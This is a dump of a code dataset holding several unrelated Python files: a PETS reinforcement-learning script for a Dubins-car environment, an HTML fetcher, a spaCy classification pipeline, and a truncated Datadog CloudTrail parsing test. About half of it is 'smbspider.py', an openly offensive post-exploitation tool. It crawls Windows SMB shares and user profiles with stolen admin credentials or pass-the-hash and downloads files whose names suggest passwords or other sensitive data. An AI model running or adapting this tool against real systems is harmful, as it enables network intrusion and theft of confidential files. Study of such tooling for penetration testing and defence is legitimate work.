hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
12f6a69fd0573ee6b9b0a6c81a158a82f44d6769
| 6,480
|
py
|
Python
|
playground/pets_dubins.py
|
pecey/mbrl-lib
|
ebca518b35a1370dbaede2a1c96fcde714bc5489
|
[
"MIT"
] | null | null | null |
playground/pets_dubins.py
|
pecey/mbrl-lib
|
ebca518b35a1370dbaede2a1c96fcde714bc5489
|
[
"MIT"
] | null | null | null |
playground/pets_dubins.py
|
pecey/mbrl-lib
|
ebca518b35a1370dbaede2a1c96fcde714bc5489
|
[
"MIT"
] | null | null | null |
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import torch
import omegaconf
import mbrl.env.continuous_dubins as dubins_env
import mbrl.env.reward_fns as reward_fns
import mbrl.env.termination_fns as termination_fns
import mbrl.models as models
import mbrl.planning as planning
import mbrl.util.common as common_util
import mbrl.util as util
def train_callback(_model, _total_calls, _epoch, tr_loss, val_score, _best_val):
train_losses.append(tr_loss)
val_scores.append(val_score.mean().item()) # this returns val score per ensemble model
def plot_graph(_axs, _frame, _text, _trial, _steps_trial, _all_rewards, force_update=False):
if not force_update and (_steps_trial % 10 != 0):
return
_axs.clear()
_axs.set_xlim([0, num_trials + .1])
_axs.set_ylim([0, 200])
_axs.set_xlabel("Trial")
_axs.set_ylabel("Trial reward")
_axs.plot(_all_rewards, 'bs-')
_text.set_text(f"Trial {_trial + 1}: {_steps_trial} steps")
if __name__ == "__main__":
mpl.rcParams.update({"font.size": 16})
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
noisy = False
seed = 0
env = dubins_env.ContinuousDubinsEnv(noisy)
env.seed(seed)
rng = np.random.default_rng(seed=seed)
generator = torch.Generator(device=device)
generator.manual_seed(seed)
obs_shape = env.observation_space.shape
act_shape = env.action_space.shape
# This functions allows the model to evaluate the true rewards given an observation
reward_fn = reward_fns.continuous_dubins
# This function allows the model to know if an observation should make the episode end
term_fn = termination_fns.continuous_dubins
trial_length = 200
num_trials = 10
ensemble_size = 5
# Everything with "???" indicates an option with a missing value.
# Our utility functions will fill in these details using the
# environment information
cfg_dict = {
# dynamics model configuration
"dynamics_model": {
"model": {
"_target_": "mbrl.models.GaussianMLP",
"device": device,
"num_layers": 3,
"ensemble_size": ensemble_size,
"hid_size": 200,
"use_silu": True,
"in_size": "???",
"out_size": "???",
"deterministic": False,
"propagation_method": "fixed_model"
}
},
# options for training the dynamics model
"algorithm": {
"learned_rewards": False,
"target_is_delta": True,
"normalize": True,
},
# these are experiment specific options
"overrides": {
"trial_length": trial_length,
"num_steps": num_trials * trial_length,
"model_batch_size": 32,
"validation_ratio": 0.05
}
}
cfg = omegaconf.OmegaConf.create(cfg_dict)
# Create a 1-D dynamics model for this environment
dynamics_model = common_util.create_one_dim_tr_model(cfg, obs_shape, act_shape)
# Create a gym-like environment to encapsulate the model
model_env = models.ModelEnv(env, dynamics_model, term_fn, reward_fn, generator=generator)
replay_buffer = common_util.create_replay_buffer(cfg, obs_shape, act_shape, rng=rng)
common_util.rollout_agent_trajectories(
env,
trial_length, # initial exploration steps
planning.RandomAgent(env),
{}, # keyword arguments to pass to agent.act()
replay_buffer=replay_buffer,
trial_length=trial_length
)
print("# samples stored", replay_buffer.num_stored)
agent_cfg = omegaconf.OmegaConf.create({
# this class evaluates many trajectories and picks the best one
"_target_": "mbrl.planning.TrajectoryOptimizerAgent",
"planning_horizon": 15,
"replan_freq": 1,
"verbose": False,
"action_lb": "???",
"action_ub": "???",
# this is the optimizer to generate and choose a trajectory
"optimizer_cfg": {
"_target_": "mbrl.planning.CEMOptimizer",
"num_iterations": 5,
"elite_ratio": 0.1,
"population_size": 500,
"alpha": 0.1,
"device": device,
"lower_bound": "???",
"upper_bound": "???",
"return_mean_elites": True
}
})
agent = planning.create_trajectory_optim_agent_for_model(
model_env,
agent_cfg,
num_particles=20
)
train_losses = []
val_scores = []
# Create a trainer for the model
model_trainer = models.ModelTrainer(dynamics_model, optim_lr=1e-3, weight_decay=5e-5)
# Create visualization objects
fig, axs = plt.subplots(1, 1, figsize=(14, 3.75))
ax_text = axs.text(300, 50, "")
# Main PETS loop
all_rewards = [0]
for trial in range(num_trials):
obs = env.reset()
agent.reset()
done = False
total_reward = 0.0
steps_trial = 0
while not done:
# --------------- Model Training -----------------
if steps_trial == 0:
dynamics_model.update_normalizer(replay_buffer.get_all()) # update normalizer stats
dataset_train, dataset_val = replay_buffer.get_iterators(
batch_size=cfg.overrides.model_batch_size,
val_ratio=cfg.overrides.validation_ratio,
train_ensemble=True,
ensemble_size=ensemble_size,
shuffle_each_epoch=True,
bootstrap_permutes=False, # build bootstrap dataset using sampling with replacement
)
model_trainer.train(
dataset_train, dataset_val=dataset_val, num_epochs=50, patience=50, callback=train_callback)
# --- Doing env step using the agent and adding to model dataset ---
next_obs, reward, done, _ = common_util.step_env_and_add_to_buffer(env, obs, agent, {}, replay_buffer)
obs = next_obs
total_reward += reward
steps_trial += 1
if steps_trial == trial_length:
break
all_rewards.append(total_reward)
env.save_trajectory(f"dubins_{trial}.png")
print(all_rewards)
plot_graph(axs, None, ax_text, trial, steps_trial, all_rewards, force_update=True)
# fig.savefig("dubins.png")
| 34.105263
| 114
| 0.622531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,828
| 0.282099
|
12f7704aea2bda946e46a42c6fdb1b32ab8e104a
| 39
|
py
|
Python
|
pixiv_spider/__init__.py
|
Uzukidd/Pixiv-spider
|
10d21bf8f1e0ec0b0792383ae9e8ae55e77efd17
|
[
"MIT"
] | 1
|
2021-11-12T19:16:56.000Z
|
2021-11-12T19:16:56.000Z
|
pixiv_spider/__init__.py
|
Uzukidd/Pixiv-web-crawler
|
10d21bf8f1e0ec0b0792383ae9e8ae55e77efd17
|
[
"MIT"
] | null | null | null |
pixiv_spider/__init__.py
|
Uzukidd/Pixiv-web-crawler
|
10d21bf8f1e0ec0b0792383ae9e8ae55e77efd17
|
[
"MIT"
] | null | null | null |
# from pixiv_web_crawler import Getters
| 39
| 39
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 1
|
12f80c5f985c410a5af8bdf06f87e46b6aa396c4
| 1,241
|
py
|
Python
|
parsers/parsers_base.py
|
xm4dn355x/async_test
|
92e7ec6a693ff4850ed603c0f4f0fa83e63b4e49
|
[
"MIT"
] | null | null | null |
parsers/parsers_base.py
|
xm4dn355x/async_test
|
92e7ec6a693ff4850ed603c0f4f0fa83e63b4e49
|
[
"MIT"
] | null | null | null |
parsers/parsers_base.py
|
xm4dn355x/async_test
|
92e7ec6a693ff4850ed603c0f4f0fa83e63b4e49
|
[
"MIT"
] | null | null | null |
#
# Общие функции для всех парсеров
#
# Автор: Никитенко Михаил
# Лицензия: MIT License
#
from time import sleep
import requests
def get_htmls(urls):
"""
Получает список URL-адресов
Возвращает список из всех полученных HTML документов
:param urls: Список URL-адресов
:type urls: list
:return: Возвращаем список HTML-документов
"""
htmls = [] # Готовим болванку для возвращаемого значения
for url in urls: # Прогоняем все URL из списка
html = get_html(url) # Получаем HTML по полученному URL из списка
htmls.append(html) # Добавляем полученный HTML в возвращаемый список
sleep(1)
return htmls # Возвращаем список в котором каждый элемент - это HTML документ
def get_html(url):
"""
Получает URL-адрес
Возвращает тело HTML документа
:param url: URL-адрес
:type url: str
:return: Возвращаем HTML-документ
"""
print(f"""get_html url={url}""")
r = requests.get(url, headers={'User-Agent': 'Custom'}) # Создаем объект web-страницы по полученному url
print(r) # Ответ от сервера <Response [200]>
return r.text # Возвращаем тело HTML документа
if __name__ == '__main__':
pass
| 27.577778
| 109
| 0.654311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,350
| 0.793184
|
12f867945891bf95b1fd61c639ac565c8cecb9f9
| 16,303
|
py
|
Python
|
smbspider/smbspider.py
|
vonahi/pentesting_scripts
|
233b07a13e631cd121985465c083327f2fe372b6
|
[
"MIT"
] | 13
|
2019-09-18T17:15:22.000Z
|
2022-02-20T00:28:35.000Z
|
smbspider/smbspider.py
|
vonahi/pentesting_scripts
|
233b07a13e631cd121985465c083327f2fe372b6
|
[
"MIT"
] | null | null | null |
smbspider/smbspider.py
|
vonahi/pentesting_scripts
|
233b07a13e631cd121985465c083327f2fe372b6
|
[
"MIT"
] | 4
|
2019-07-24T10:03:41.000Z
|
2021-11-22T06:19:54.000Z
|
#!/usr/bin/python
#
# This post-exploitation script can be used to spider numerous systems
# to identify sensitive and/or confidential data. A good scenario to
# use this script is when you have admin credentials to tons of
# Windows systems, and you want to look for files containing data such
# as PII, network password documents, etc. For the most part,
# this script uses smbclient, parses the results, and prints
# out the results in a nice format for you.
#
# Author: Alton Johnson <alton@vonahi.io
# Version: 2.4
# Updated: 01/23/2014
#
import commands, time, getopt, re, os
from sys import argv
start_time = time.time()
class colors:
red = "\033[1;31m"
blue = "\033[1;34m"
norm = "\033[0;00m"
green = "\033[1;32m"
banner = "\n " + "*" * 56
banner += "\n * _ *"
banner += "\n * | | // \\\\ *"
banner += "\n * ___ _ __ ___ | |__ _\\\\()//_ *"
banner += "\n * / __| '_ ` _ \| '_ \ / // \\\\ \ *"
banner += "\n * \__ \ | | | | | |_) | |\__/| *"
banner += "\n * |___/_| |_| |_|_.__/ *"
banner += "\n * *"
banner += "\n * SMB Spider v2.4, Alton Johnson (alton@vonahi.io) *"
banner += "\n " + "*" * 56 + "\n"
def help():
print banner
print " Usage: %s <OPTIONS>" % argv[0]
print colors.red + "\n Target(s) (required): \n" + colors.norm
print "\t -h <host>\t Provide IP address or a text file containing IPs."
print "\t\t\t Supported formats: IP, smb://ip/share, \\\\ip\\share\\"
print colors.red + "\n Credentials (required): \n" + colors.norm
print "\t -u <user>\t Specify a valid username to authenticate to the system(s)."
print "\t -p <pass>\t Specify the password which goes with the username."
print "\t -P <hash>\t Use -P to provide password hash if cleartext password isn't known."
print "\t -d <domain>\t If using a domain account, provide domain name."
print colors.green + "\n Shares (optional):\n" + colors.norm
print "\t -s <share>\t Specify shares (separate by comma) or specify \"profile\" to spider user profiles."
print "\t -f <file>\t Specify a list of shares from a file."
print colors.green + "\n Other (optional):\n" + colors.norm
print "\t -w \t\t Avoid verbose output. Output successful spider results to smbspider_host_share_user.txt."
print "\t\t\t This option is HIGHLY recommended if numerous systems are being scanned."
print "\t -n \t\t ** Ignore authentication check prior to spidering."
print "\t -g <file> \t Grab (download) files that match strings provided in text file. (Case sensitive.)"
print "\t\t\t ** Examples: *assword.doc, *assw*.doc, pass*.xls, etc."
print colors.norm
exit()
def start(argv):
if len(argv) < 1:
help()
try:
opts, args = getopt.getopt(argv, "u:p:d:h:s:f:P:wng:")
except getopt.GetoptError, err:
print colors.red + "\n [-] Error: " + str(err) + colors.norm
# set default variables to prevent errors later in script
sensitive_strings = []
smb_user = ""
smb_pass = ""
smb_domain = ""
smb_host = []
smb_share = ["profile"]
pth = False
output = False
unique_systems = []
ignorecheck = False
inputfile = False
#parse through arguments
for opt, arg in opts:
if opt == "-u":
smb_user = arg
elif opt == "-p":
smb_pass = arg
elif opt == "-d":
smb_domain = arg
elif opt == "-h":
try:
smb_host = open(arg).read().split('\n')
inputfile = True
except:
if "\\\\" in arg and "\\" not in arg[-1:]:
test = arg[2:].replace("\\","\\")
smb_host.append("\\\\%s\\" % test)
else:
smb_host.append(arg)
elif opt == "-f":
smb_share = open(arg).read().split()
elif opt == "-s":
smb_share = arg.split(',')
elif opt == "-P":
if arg[-3:] == ":::":
arg = arg[:-3]
smb_pass = arg
pth = True
elif opt == "-w":
output = True
elif opt == "-n":
ignorecheck = True
elif opt == "-g":
sensitive_strings = open(arg).read().split("\n")[:-1]
#check options before proceeding
if (not smb_user or not smb_pass or not smb_host):
print colors.red + "\n [-] " + colors.norm + "Error: Please check to ensure that all required options are provided."
help()
if pth:
result = commands.getoutput("pth-smbclient")
if "not found" in result.lower():
print colors.red + "\n [-] " + colors.norm + "Error: The passing-the-hash package was not found. Therefore, you cannot pass hashes."
print "Please run \"apt-get install passing-the-hash\" to fix this error and try running the script again.\n"
exit()
#make smb_domain, smb_user, and smb_pass one variable
if smb_domain:
credentials = smb_domain + "\\\\" + smb_user + " " + smb_pass
else:
credentials = smb_user + " " + smb_pass
for system in smb_host:
if "\\" in system or "//" in system:
if "\\" in system:
sys = system[system.find("\\")+2:]
sys = sys[:sys.find("\\")]
else:
sys = system[system.find("/")+2:]
sys = sys[:sys.find("/")]
if sys not in unique_systems:
unique_systems.append(sys)
else:
unique_systems.append(system)
#start spidering
print banner
unique_systems = [i for i in unique_systems if i != ''] #remove blank elements from list
print " [*] Spidering %s system(s)..." % len(unique_systems)
begin = spider(credentials, smb_host, smb_share, pth, output, ignorecheck, inputfile, sensitive_strings)
begin.start_spidering()
class spider:
def __init__(self, credentials, hosts, shares, pth, output, ignorecheck, inputfile, sensitive_strings):
self.list_of_hosts = hosts
self.list_of_shares = shares
self.credentials = credentials
self.smb_host = ""
self.smb_share = ""
self.skip_host = ""
self.pth = pth
self.outputfile = output
self.blacklisted = []
self.ignorecheck = ignorecheck
self.inputfile = inputfile
self.smb_download = True
self.file_locations = []
self.sensitive_strings = sensitive_strings
self.profile = False
def start_spidering(self):
share = ""
self.total_hosts = 0
empty_share_error = colors.red + " [-] " + colors.norm + "Error: Empty share detected for host %s. Skipping share."
for test_host in self.list_of_hosts:
temp = test_host
if ("//" in temp or "\\\\" in temp) and self.list_of_shares[0] != "profile":
print colors.red + " [-] " + colors.norm + "Error: You cannot specify a share if your target(s) contains \\\\<ip>\\<share> or //<ip>/<share>\n"
exit()
for host in self.list_of_hosts:
self.total_hosts += 1
tmp_share = host.replace("/","")
tmp_share = host.replace("\\","")
orig_host = host # ensures that we can check the original host value later on if we need to
if "\\\\" in host: # this checks to see if host is in the format of something like \\192.168.0.1\C$
host = host[2:]
host = host[:host.find("\\")]
elif "smb://" in host: # this checks to see if the host contains a format such as smb://192.168.0.1/C$
host = host[6:]
host = host[:host.find("/")]
if self.skip_host == host:
self.blacklisted.append(host)
continue
if len(self.list_of_shares) == 1 and ("//" in orig_host or "\\\\" in orig_host):
if "//" in orig_host:
share = orig_host[orig_host.rfind("/")+1:]
elif "\\\\" in orig_host:
if orig_host[-1] == "\\":
temp = orig_host[:-1]
share = temp[temp.rfind("\\")+1:]
self.smb_host = host
self.smb_share = share
else:
for share in self.list_of_shares:
if self.skip_host == host:
self.blacklisted.append(host)
break
self.smb_host = host
self.smb_share = share
tmp_share = tmp_share.replace(self.smb_host,"")
tmp_share = tmp_share.replace("smb:///","")
if len(tmp_share) == 0 and (self.smb_share != "profile" and len(self.smb_share) == 0):
print empty_share_error % self.smb_host
continue
if len(self.list_of_shares) > 1:
for x in self.list_of_shares:
self.smb_share = x
print "\n [*] Attempting to spider smb://%s/%s" % (self.smb_host, self.smb_share.replace("profile","<user profiles>"))
self.spider_host()
else:
print "\n [*] Attempting to spider smb://%s/%s " % (self.smb_host, self.smb_share.replace("profile","<user profiles>"))
self.spider_host()
if self.list_of_shares[0] == "profile":
if self.inputfile:
print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts-1))
else:
print " [*] Finished with smb://%s/<user profiles>. [Remaining: %s] " % (self.smb_host, str(len(self.list_of_hosts)-self.total_hosts))
else:
print " [*] Finished with smb://%s/%s. [Remaining: %s] " % (self.smb_host, self.smb_share, str(len(self.list_of_hosts)-self.total_hosts))
if self.smb_download: self.start_downloading()
def start_downloading(self):
if len(self.sensitive_strings) == 0: return
print "\n" + colors.blue + " [*] " + colors.norm + "Attempting to download files that were deemed sensitive."
if not os.path.exists('smbspider-downloads'):
os.makedirs('smbspider-downloads')
for f in self.file_locations:
host = f[2:]
host = str(host[:host.find("\\")])
share = f[len(host)+3:]
share = share[:share.find("\\")]
full_path = f.replace("\\\\%s\\%s\\" % (host, share), "").strip()
file_name = full_path[full_path.rfind("\\")+1:]
for s in self.sensitive_strings:
if s in file_name:
result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \
host,file_name, host, share, self.credentials))
print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share)
commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s\"" % (host, file_name, host, file_name))
else:
temp_file = s.split("*")
all_match = 0
for tmp in temp_file:
if tmp in full_path:
all_match = 1
else:
all_match = 0
break
if all_match == 1:
result = commands.getoutput("%s -c \"get \\\"%s\\\" \\\"%s_%s\\\"\" //%s/%s -U %s " % (self.smbclient(), full_path.replace("\\","\\\\"), \
host,file_name, host, share, self.credentials))
print colors.blue + " [*] " + colors.norm + "Downloaded: %s from smb://%s/%s" % (file_name, host, share)
commands.getoutput("mv \"%s_%s\" \"smbspider-downloads/%s_%s\"" % (host, file_name, host, file_name))
def parse_result(self, result):
############################################################
# this small section removes all of the unnecessary crap. a bit ugly, i know! :x
errors = ["O_SUCH_F","ACCESS_DEN",
"US_OBJECT_NAME_IN", "US_INVALID_NETWORK_RE", "CT_NAME_NOT",
"not present","CONNECTION_REFUSED"
]
result = result.split('\n')
purge = []
trash = [" . ", " .. ", "Domain=", " D", "blocks of size",
"wrapper called", "Substituting user supplied"]
for num in range(0,len(result)):
for d in trash:
if d in result[num] or len(result[num]) < 2:
purge.append(num)
purge = list(set(purge))
purge = sorted(purge, reverse=True)
for i in purge:
del result[i]
############################################################
directory = ""
filename = ""
file_locations = []
file_change = False
for x in result:
if x[0] == "\\":
directory = x
file_change = False
else:
filename = x[2:]
filename = filename[:filename.find(" ")]
file_change = True
fail = 0
if not file_change: continue
for error in errors:
if error in filename:
fail = 1
if fail == 0 and len(filename) > 0:
if not self.outputfile:
file_complete_path = "\\\\%s\%s" % (self.smb_host,self.smb_share) + directory + "\\" + filename
print colors.blue + " [*] " + colors.norm + file_complete_path
else:
if not os.path.exists('smbspider'):
os.makedirs('smbspider')
if self.profile:
lawl_share = "profile"
else:
lawl_share = self.smb_share
output = open("smbspider/smbspider_%s_%s_%s.txt" % (self.smb_host, lawl_share, self.credentials.split()[0]), 'a')
file_complete_path = colors.blue + " [*] " + colors.norm + "\\\\%s\%s" % (self.smb_host,lawl_share) + directory + "\\" + filename + "\n"
output.write(file_complete_path)
output.close()
if self.smb_download:
self.file_locations.append(file_complete_path[file_complete_path.find("\\\\"):])
def fingerprint_fs(self):
result = commands.getoutput("%s -c \"ls Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)).split()
if self.check_errors(result[-1]):
return "error"
if "NT_STATUS_OBJECT_NAME_NOT_FOUND" in result:
return "old"
else:
return "new"
def find_users(self, result):
result = result.split('\n')
purge = []
users = []
for num in range(0,len(result)): # cleans some stuff up a bit.
if " . " in result[num] or " .. " in result[num] or "Domain=" in result[num]\
or len(result[num]) < 2 or "blocks of size" in result[num]:
purge.append(num)
purge = sorted(purge, reverse=True)
for i in purge:
del result[i]
#clean up users list a little bit
for i in result:
user = i[:i.find(" D")]
user = user[2:user.rfind(re.sub(r'\W+', '', user)[-1])+1]
users.append(user)
return users
def check_errors(self, result):
access_error = {
"UNREACHABLE":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host,
"UNSUCCESSFUL":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host,
"TIMEOUT":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host,
"LOGON_SERVER":" [-] Error %s Cannot contact logon server. Skipping host." % self.smb_host
}
for err in access_error:
if err in result:
print colors.red + access_error[err] + colors.norm
self.skip_host = self.smb_host
return True
if "LOGON_FAIL" in result.split()[-1] and not self.ignorecheck:
print colors.red + " [-] " + colors.norm + "Error [%s]: Invalid credentials. Please correct credentials and try again." % self.smb_host
exit()
elif "ACCESS_DENIED" in result.split()[-1]:
print colors.red + " [-] " + colors.norm + "Error [%s]: Valid credentials, but no access. Try another account." % self.smb_host
elif "BAD_NETWORK" in result.split()[-1] or "CONNECTION_REFUSED" in result.split()[-1]:
print colors.red + " [-] " + colors.norm + "Error: Invalid share -> smb://%s/%s" % (self.smb_host,self.smb_share)
return True
def smbclient(self):
if self.pth:
return "pth-smbclient"
else:
return "smbclient"
def spider_host(self):
if self.smb_share.lower() == "profile":
self.smb_share = "C$"
self.profile = True
if self.fingerprint_fs() == "error":
return
elif self.fingerprint_fs() == "old":
folders = ['My Documents','Desktop','Documents']
result = commands.getoutput("%s -c \"ls \\\"Documents and Settings\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials))
if self.check_errors(result):
return
users = self.find_users(result)
for user in users:
for folder in folders:
result = commands.getoutput("%s -c \"recurse;ls \\\"Documents and Settings\\%s\\%s\" //%s/C$ -U %s"\
% (self.smbclient(), user, folder, self.smb_host, self.credentials))
self.parse_result(result)
else:
folders = ['Documents','Desktop','Music','Videos','Downloads','Pictures']
result = commands.getoutput("%s -c \"ls \\\"Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials))
if self.check_errors(result):
return
users = self.find_users(result)
for user in users:
for folder in folders:
result = commands.getoutput("%s -c \"recurse;ls \\\"Users\\%s\\%s\" //%s/C$ -U %s" % (self.smbclient(), user, folder, self.smb_host, self.credentials))
self.parse_result(result)
else:
result = commands.getoutput("%s -c \"recurse;ls\" \"//%s/%s\" -U %s" % (self.smbclient(), self.smb_host, self.smb_share, self.credentials))
if self.check_errors(result):
return
self.parse_result(result)
if __name__ == "__main__":
try:
start(argv[1:])
except KeyboardInterrupt:
print "\nExiting. Interrupted by user (ctrl-c)."
exit()
except Exception, err:
print err
exit()
print "\n-----"
print "Completed in: %.1fs" % (time.time() - start_time)
| 38.541371
| 157
| 0.626326
| 10,829
| 0.664234
| 0
| 0
| 0
| 0
| 0
| 0
| 5,905
| 0.362203
|
12fad400aa5ee6c8bf4a6f0d061c8bf3df14fbb1
| 1,675
|
py
|
Python
|
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py
|
mlonaws/huggingface_hub
|
588f74b98fbcab2cd7e61a74cc6d9649a92e0ef2
|
[
"Apache-2.0"
] | 362
|
2020-12-22T10:24:06.000Z
|
2022-03-30T22:47:25.000Z
|
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py
|
mlonaws/huggingface_hub
|
588f74b98fbcab2cd7e61a74cc6d9649a92e0ef2
|
[
"Apache-2.0"
] | 547
|
2020-12-24T13:35:57.000Z
|
2022-03-31T17:32:42.000Z
|
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py
|
mlonaws/huggingface_hub
|
588f74b98fbcab2cd7e61a74cc6d9649a92e0ef2
|
[
"Apache-2.0"
] | 98
|
2021-01-06T17:37:09.000Z
|
2022-03-29T07:20:08.000Z
|
import os
import subprocess
import sys
from typing import Dict, List
from app.pipelines import Pipeline
class TextClassificationPipeline(Pipeline):
def __init__(
self,
model_id: str,
):
# At the time, only public models from spaCy are allowed in the inference API.
full_model_path = model_id.split("/")
if len(full_model_path) != 2:
raise ValueError(
f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)"
)
namespace, model_name = full_model_path
package = f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl"
cache_dir = os.environ["PIP_CACHE"]
subprocess.check_call(
[sys.executable, "-m", "pip", "install", "--cache-dir", cache_dir, package]
)
import spacy
self.model = spacy.load(model_name)
def __call__(self, inputs: str) -> List[List[Dict[str, float]]]:
"""
Args:
inputs (:obj:`str`):
a string containing some text
Return:
A :obj:`list`:. The object returned should be a list of one list like [[{"label": 0.9939950108528137}]] containing :
- "label": A string representing what the label/class is. There can be multiple labels.
- "score": A score between 0 and 1 describing how confident the model is for this label/class.
"""
doc = self.model(inputs)
categories = []
for cat, score in doc.cats.items():
categories.append({"label": cat, "score": score})
return [categories]
| 34.895833
| 128
| 0.601791
| 1,567
| 0.935522
| 0
| 0
| 0
| 0
| 0
| 0
| 788
| 0.470448
|
12fb3b1f1de02a4bb72cea078775fd6a9b6cb1ac
| 4,867
|
py
|
Python
|
aws/logs_monitoring/tests/test_cloudtrail_s3.py
|
rkitron/datadog-serverless-functions
|
d69fe6fdb489c262ffa76a529b22f2a81ae6deba
|
[
"Apache-2.0"
] | 232
|
2018-11-20T16:57:04.000Z
|
2022-03-23T14:38:11.000Z
|
aws/logs_monitoring/tests/test_cloudtrail_s3.py
|
rkitron/datadog-serverless-functions
|
d69fe6fdb489c262ffa76a529b22f2a81ae6deba
|
[
"Apache-2.0"
] | 207
|
2018-10-25T11:48:20.000Z
|
2022-03-23T00:21:10.000Z
|
aws/logs_monitoring/tests/test_cloudtrail_s3.py
|
rkitron/datadog-serverless-functions
|
d69fe6fdb489c262ffa76a529b22f2a81ae6deba
|
[
"Apache-2.0"
] | 308
|
2018-10-24T13:36:05.000Z
|
2022-03-21T21:17:02.000Z
|
from unittest.mock import MagicMock, patch
import os
import sys
import unittest
import json
import copy
import io
import gzip
sys.modules["trace_forwarder.connection"] = MagicMock()
sys.modules["datadog_lambda.wrapper"] = MagicMock()
sys.modules["datadog_lambda.metric"] = MagicMock()
sys.modules["datadog"] = MagicMock()
sys.modules["requests"] = MagicMock()
sys.modules["requests_futures.sessions"] = MagicMock()
env_patch = patch.dict(
os.environ,
{
"DD_API_KEY": "11111111111111111111111111111111",
"DD_ADDITIONAL_TARGET_LAMBDAS": "ironmaiden,megadeth",
},
)
env_patch.start()
import lambda_function
import parsing
env_patch.stop()
class Context:
function_version = 0
invoked_function_arn = "invoked_function_arn"
function_name = "function_name"
memory_limit_in_mb = "10"
test_data = {
"Records": [
{
"eventVersion": "1.08",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration",
"arn": "arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d",
"accountId": "601427279990",
"accessKeyId": "ASIAYYB64AB3DWOY7JNT",
"sessionContext": {
"sessionIssuer": {
"type": "Role",
"principalId": "AROAYYB64AB3HGPQO2EPR",
"arn": "arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole",
"accountId": "601427279990",
"userName": "Siti_DatadogAWSIntegrationRole",
},
"attributes": {
"creationDate": "2021-05-02T23:49:01Z",
"mfaAuthenticated": "false",
},
},
},
"eventTime": "2021-05-02T23:53:28Z",
"eventSource": "dynamodb.amazonaws.com",
"eventName": "DescribeTable",
"awsRegion": "us-east-1",
"sourceIPAddress": "54.162.201.161",
"userAgent": "Datadog",
"requestParameters": {"tableName": "KinesisClientLibraryLocal"},
"responseElements": None,
"requestID": "A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG",
"eventID": "a5dd11f9-f616-4ea8-8030-0b3eef554352",
"readOnly": True,
"resources": [
{
"accountId": "601427279990",
"type": "AWS::DynamoDB::Table",
"ARN": "arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal",
}
],
"eventType": "AwsApiCall",
"apiVersion": "2012-08-10",
"managementEvent": True,
"recipientAccountId": "601427279990",
"eventCategory": "Management",
}
]
}
def test_data_gzipped() -> io.BytesIO:
return io.BytesIO(
gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8"))
)
class TestS3CloudwatchParsing(unittest.TestCase):
def setUp(self):
self.maxDiff = 9000
@patch("parsing.boto3")
@patch("lambda_function.boto3")
def test_s3_cloudtrail_pasing_and_enrichment(self, lambda_boto3, parsing_boto3):
context = Context()
boto3 = parsing_boto3.client()
boto3.get_object.return_value = {"Body": test_data_gzipped()}
payload = {
"s3": {
"bucket": {
"name": "test-bucket",
},
"object": {
"key": "601427279990_CloudTrail_us-east-1_20210503T0000Z_QrttGEk4ZcBTLwj5.json.gz"
},
}
}
result = parsing.parse({"Records": [payload]}, context)
expected = copy.deepcopy([test_data["Records"][0]])
expected[0].update(
{
